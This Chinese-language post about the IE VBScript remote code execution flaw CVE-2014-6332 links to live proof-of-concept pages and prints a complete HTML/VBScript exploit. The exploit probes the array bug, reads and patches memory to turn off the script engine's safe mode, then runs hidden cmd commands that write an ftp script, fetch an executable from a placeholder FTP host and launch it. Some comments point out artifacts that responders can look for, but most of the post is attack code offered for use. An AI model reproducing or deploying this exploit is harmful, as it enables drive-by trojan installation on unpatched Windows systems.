Win95+IE3 – Win10+IE11全版本远程代码执行漏洞(含POC)

微软本月安全更新修复了一个潜藏了18年的IE远程代码执行漏洞(CVE-2014-6332)。缺陷出现在VBScript的代码中,自Windows 95首次发布(19年前)以来就一直存在。此漏洞影响IE以及基于IE内核的浏览器(比如360、QQ浏览器等)。


关于微软安全补丁

微软披露了一个存在于所有Windows版本的高危漏洞。建议所有Windows用户,尤其是运行网站的用户,尽快安装微软周二发布的补丁。

《微软披露影响所有Windows版本的高危漏洞》

《Microsoft昨日发布高达16个安全补丁》

POC之一:打开任务管理器和计算器

测试地址:http://www.weizn.net/exp/ie.html

测试截图

test1.jpg



POC之二:添加wayne账户

测试地址:http://www.weizn.net/exp/useradd.htm

测试截图

test2.jpg


POC之三:远程木马下载

代码如下:




    <!DOCTYPE html>  
    <html>  
    <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >  
        <meta http-equiv="content-type" content="text/html;charset=utf-8">  
    <head>  
    </head>  
    <body>  
    <SCRIPT LANGUAGE="VBScript">  
      
    ' Payload stage. Called from setnotsafemode() after the probe succeeds;
    ' everything here runs through Wscript.Shell with the browser user's
    ' rights, outside any browser sandbox.
    ' Host artifacts a responder can look for (all taken from the literal
    ' command lines below): d:\Notepad.bat, d:\Notepad.exe, and
    ' cmd.exe -> ftp.exe / Notepad.exe spawned with a hidden window (0).
    ' "FTP地址" in the first run line is the author's placeholder for the
    ' FTP host; username/password are likewise placeholders.
    function runmumaa()   
    ' Every failure below is swallowed; see the Err.Description write at the end.
    On Error Resume Next
    Set objWsh = CreateObject("Wscript.Shell")

    ' Writes d:\Notepad.bat line by line. The first three lines (whoami,
    ' netstat -an, set) are not ftp commands, so ftp -s presumably rejects
    ' them; the rest is an ftp session: open / user / password / dir /
    ' get sec.exe -> d:\Notepad.exe / bye.
    objWsh.run "cmd.exe /c echo whoami>d:\Notepad.bat&echo netstat -an>>d:\Notepad.bat&echo set>>d:\Notepad.bat&echo open FTP地址>>d:\Notepad.bat&echo username>>d:\Notepad.bat&echo password>>d:\Notepad.bat&echo dir>>d:\Notepad.bat&echo get sec.exe d:\Notepad.exe>>d:\Notepad.bat&echo bye>>d:\Notepad.bat",0
    ' Feeds the script to ftp.exe, hidden (0) and waits for it (true).
    objWsh.run "cmd.exe /c ftp -s:d:\Notepad.bat",0,true
    ' Runs whatever was downloaded, again hidden and synchronous.
    objWsh.run "cmd.exe /c D:\Notepad.exe -e",0,true
    ' The last error text (if any) ends up visible in the page.
    document.write(Err.Description)
    end function  
      
    </script>  
      
    <SCRIPT LANGUAGE="VBScript">  
       
    ' Shared state for the probe/exploit functions below.
    dim   aa()          ' dynamic arrays re-dimensioned by Over(), mydata(), ReadMemo()
    dim   ab()  
    dim   a0            ' base upper bound for aa/ab; randomized in BeginInit()
    dim   a1            ' a0+2, set in Over()
    dim   a2            ' a0+&h8000000, set in Over() — the oversized redim
    dim   a3            ' random increment added to a0 on each Over() attempt
    dim   win9x         ' set to 1 by Over() when the type read is &hB9AD
    dim   intVersion    ' IE major version parsed from the UA in Begin()
    dim   rnda          ' not referenced anywhere on this page
    dim   funclass      ' not referenced anywhere on this page
    dim   myarray       ' chrw() string assembled in Begin(), stored by mydata()

    ' Entry point: executes as soon as this script element is parsed.
    Begin()  
      
    ' Entry point (invoked unconditionally above). Fingerprints the browser
    ' from the UA string, initializes the arrays, and dispatches by IE
    ' major version once the Create() probe has succeeded.
    function Begin()  
      On Error Resume Next  
      info=Navigator.UserAgent  
  
      ' 64-bit IE is not attempted at all.
      if(instr(info,"Win64")>0)   then  
         exit   function  
      end if  
  
      ' Major version = the two characters after "MSIE ". NOTE(review): an
      ' IE11 UA carries no "MSIE" token unless the page runs in a legacy
      ' document mode; the X-UA-Compatible IE=EmulateIE8 meta above is
      ' presumably there for that reason — not verifiable from this page.
      if (instr(info,"MSIE")>0)   then   
                 intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2))     
      else  
         exit   function    
                   
      end if  
  
      win9x=0  
  
      BeginInit()  
      ' Create() retries the Over() probe; nothing further runs on failure.
      If Create()=True Then  
         myarray=        chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)  
         myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0)  
  
         if(intVersion<4) then  
             document.write("<br> IE")  
             document.write(intVersion)  
             ' runshellcode() is not defined anywhere on this page, so under
             ' On Error Resume Next this branch does nothing here.
             runshellcode()                      
         else    
              setnotsafemode()  
         end if  
      end if  
    end function  
      
    ' Seeds the RNG and picks the starting array size (a0) and the per-attempt
    ' increment (a3) at random, so each page load probes different sizes.
    function BeginInit()  
       Randomize()  
       redim aa(5)  
       redim ab(5)  
       a0=13+17*rnd(6)  
       a3=7+3*rnd(5)  
    end function  
      
    ' Retry loop around the Over() probe: up to 401 attempts (0..400),
    ' each with a larger a0. Returns True on the first success.
    function Create()  
      On Error Resume Next  
      dim i  
      Create=False  
      For i = 0 To 400  
        If Over()=True Then  
        '   document.write(i)       
           Create=True  
           Exit For  
        End If   
      Next  
    end function  
      
    ' Empty Sub. Only used by mydata(), which assigns it to a variant (i=testaa).
    sub testaa()  
    end sub  
      
    ' Produces the value that setnotsafemode() uses as its starting address:
    ' stores testaa and myarray into aa under the oversized bound a2, with
    ' specific double literals written into ab in between, and returns aa(a1).
    ' The statement order and the literal values are load-bearing; this
    ' relies on the CVE-2014-6332 defect the page describes, not on any
    ' documented VBScript behavior.
    function mydata()  
        On Error Resume Next  
         i=testaa  
         i=null  
         redim  Preserve aa(a2)    
        
         ab(0)=0  
         aa(a1)=i  
         ab(0)=6.36598737437801E-314  
  
         aa(a1+2)=myarray  
         ab(2)=1.74088534731324E-310    
         mydata=aa(a1)  
         ' Always restore the small bound before returning.
         redim  Preserve aa(a0)    
    end function   
      
      
    ' Post-probe stage for IE >= 4. Follows two pointers from mydata() via
    ' readmemo(), then scans offsets &h120..&h180 (step 4) for the value 14
    ' and overwrites that slot with ab(4) through the aa(a1+2)(...) write.
    ' The function name says this disables the script engine's safe mode;
    ' the page itself does not show what the patched field is. Ends by
    ' calling runmumaa(), i.e. the shell payload.
    function setnotsafemode()  
        On Error Resume Next  
        i=mydata()    
        i=readmemo(i+8)  
        i=readmemo(i+16)  
        j=readmemo(i+&h134)    
        for k=0 to &h60 step 4  
            j=readmemo(i+&h120+k)  
            if(j=14) then  
                  j=0            
                  redim  Preserve aa(a2)               
         aa(a1+2)(i+&h11c+k)=ab(4)  
                  redim  Preserve aa(a0)    
  
         j=0   
                  ' Re-read the same slot (result is not checked).
                  j=readmemo(i+&h120+k)     
               
                   Exit for  
               end if  
  
        next   
        ab(2)=1.69759663316747E-313  
        runmumaa()   
    end function  
      
    ' Probe used by Create(). Grows a0 by a3, re-dimensions aa/ab (a2 is
    ' a0 + &h8000000, the oversized bound), writes a double into ab(0) and
    ' an integer into aa(a0), then reads VarType(aa(a1)). Returns True when
    ' that type comes back as &h2f66, or as &hB9AD (win9x is then set to 1).
    ' Presumably this is the CVE-2014-6332 condition; the exact sequence of
    ' redims and writes is what the page depends on — do not reorder.
    function Over()  
        On Error Resume Next  
        dim type1,type2,type3  
        Over=False  
        a0=a0+a3  
        a1=a0+2  
        a2=a0+&h8000000  
        
        redim  Preserve aa(a0)   
        redim   ab(a0)       
        
        redim  Preserve aa(a2)  
        
        type1=1  
        ab(0)=1.123456789012345678901234567890  
        aa(a0)=10  
                
        If(IsObject(aa(a1-1)) = False) Then  
           ' IE < 4 uses an extra size check before trusting the type read.
           if(intVersion<4) then  
               mem=cint(a0+1)*16               
               j=vartype(aa(a1-1))  
               if((j=mem+4) or (j*8=mem+8)) then  
                  if(vartype(aa(a1-1))<>0)  Then      
                     If(IsObject(aa(a1)) = False ) Then               
                       type1=VarType(aa(a1))  
                     end if                 
                  end if  
               else  
                 redim  Preserve aa(a0)  
                 exit  function  
  
               end if   
            else  
               if(vartype(aa(a1-1))<>0)  Then      
                  If(IsObject(aa(a1)) = False ) Then  
                      type1=VarType(aa(a1))  
                  end if                 
                end if  
            end if  
        end if  
                    
          
        If(type1=&h2f66) Then           
              Over=True        
        End If    
        If(type1=&hB9AD) Then  
              Over=True  
              win9x=1  
        End If    
  
        ' Restore the normal bound regardless of outcome.
        redim  Preserve aa(a0)            
              
    end function  
      
    ' Read helper used by setnotsafemode(): stores add+4 into aa(a1) under
    ' the oversized bound, flips ab(0) to a fixed double, and returns
    ' lenb(aa(a1)). Presumably this yields the 32-bit value at address add;
    ' the page gives no other explanation. Restores aa(a0) before returning.
    function ReadMemo(add)   
        On Error Resume Next  
        redim  Preserve aa(a2)    
        
        ab(0)=0     
        aa(a1)=add+4       
        ab(0)=1.69759663316747E-313         
        ReadMemo=lenb(aa(a1))    
         
        ab(0)=0      
       
        redim  Preserve aa(a0)  
    end function  
      
    </script>  
      
    </body>  
    </html>